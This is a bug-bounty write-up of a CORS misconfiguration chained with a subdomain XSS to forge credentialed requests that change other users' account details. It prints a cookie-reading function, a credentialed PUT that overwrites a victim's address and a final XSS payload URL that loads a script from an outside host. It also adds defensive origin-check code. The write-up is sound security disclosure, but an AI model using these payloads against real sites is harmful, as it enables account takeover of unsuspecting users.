CORS To CSRF Attack
This writeup is about a CORS misconfiguration that let me perform a CSRF attack to change other users' account info. The target, which I'll call redact.com, sent a PUT request to the server to update user information such as address, name, etc.
An Origin header was also sent in the request, Origin: redact.com, and its value was reflected in the response (as Access-Control-Allow-Origin) with Access-Control-Allow-Credentials set to true, which means that cookies can be sent along with the request. I tried changing the Origin header value to evil.com and then to redact.com.evil.com, but both were rejected. Sending Origin: evil.redact.com worked, however, which means that any subdomain of redact.com can send credentialed requests to its API.
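To show why trusting every subdomain is the root of the problem, here is an added example (hypothetical server-side code, not from the writeup or the target) that puts the permissive Origin check the observations imply beside an exact allowlist; redact.com is the writeup's placeholder host and the policy names are my own.

```javascript
// Added example: server-side Origin validation for a credentialed API.
// Hypothetical helper, not code from the writeup; "redact.com" is the
// writeup's placeholder host. Real Origin headers carry a scheme.

function parseOrigin(origin) {
  try { return new URL(origin); } catch { return null; }
}

// Permissive check consistent with what the writeup observed: redact.com
// itself and every host ending in ".redact.com" are trusted, so any
// subdomain (help.redact.com included) can make cookie-bearing requests.
// redact.com.evil.com and evil.com fail because they do not end in ".redact.com".
function subdomainPolicy(origin) {
  const u = parseOrigin(origin);
  if (!u || u.protocol !== "https:") return false;
  return u.hostname === "redact.com" || u.hostname.endsWith(".redact.com");
}

// Hardened check: an exact allowlist of the few front-ends that really need
// to call the API with credentials. An unlisted subdomain gets no CORS
// headers, so script injected there cannot ride the victim's session.
const ALLOWED_ORIGINS = new Set(["https://www.redact.com"]);
function allowlistPolicy(origin) {
  return ALLOWED_ORIGINS.has(origin);
}

// Build the CORS response headers for a request carrying an Origin header.
// Returns an empty object when the origin is not trusted; the origin is
// only ever echoed back after the policy accepted it.
function corsHeadersFor(origin, policy) {
  if (!policy(origin)) return {};
  return {
    "Access-Control-Allow-Origin": origin,
    "Access-Control-Allow-Credentials": "true",
    "Vary": "Origin",
  };
}
```

With allowlistPolicy in place, the XSS on help.redact.com described next would still run, but the browser would refuse to deliver the credentialed PUT response and, with a preflight, the request itself.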
Now I needed an XSS on one of its subdomains to send the PUT request to the server; luckily, I found one on help.redact.com. That wasn't enough by itself, though: an encryptedMembershipNumber parameter was sent along with the PUT request to identify the user. Looking through the cookies of redact.com, I found that the encryptedMembershipNumber was stored in a cookie named prop_29 scoped to .redact.com; the leading dot means the cookie is accessible from its subdomains. To extract that cookie I wrote the following JS code.
function getCookie(name) {
  var match = document.cookie.match(new RegExp('(^| )' + name + '=([^;]+)'));
  if (match) return match[2];
}
Now the complete code to get the encryptedMembershipNumber and to send the PUT request.
// Read a cookie by name from document.cookie
function getCookie(name) {
  var match = document.cookie.match(new RegExp('(^| )' + name + '=([^;]+)'));
  if (match) return match[2];
}

// prop_29 is scoped to .redact.com, so it is readable from the subdomain
var cook = getCookie("prop_29");

var data = {"member":{"mailingAddress":{"addressLineOne":"Account Hacked","city":"NEW Port","stateOrProvinceCode":"NY","postalCode":"20001","email":"hacked@gmail.com","countryCode":"US"}}};

// credentials: "include" sends the victim's cookies with the cross-origin PUT
fetch(`https://www.redact.com/api/node/vivaldi/v1/account/primary-contact?encryptedMembershipNumber=${cook}`, {method: "PUT", credentials: "include", body: JSON.stringify(data)});
I created a JS file and uploaded the code on my server to use in the XSS payload.
Final Payload:
https://help.redact.com/app/answers/list?searchTerm=<svg onload=script=document['createElement']('script');script['src']='https://osamaavvan.000webhostapp.com/a.js';document['head']['appendChild'](script);>
The . and // were removed from the payload by the XSS filter, so I converted them to their respective HTML entities.
Thank You for Reading.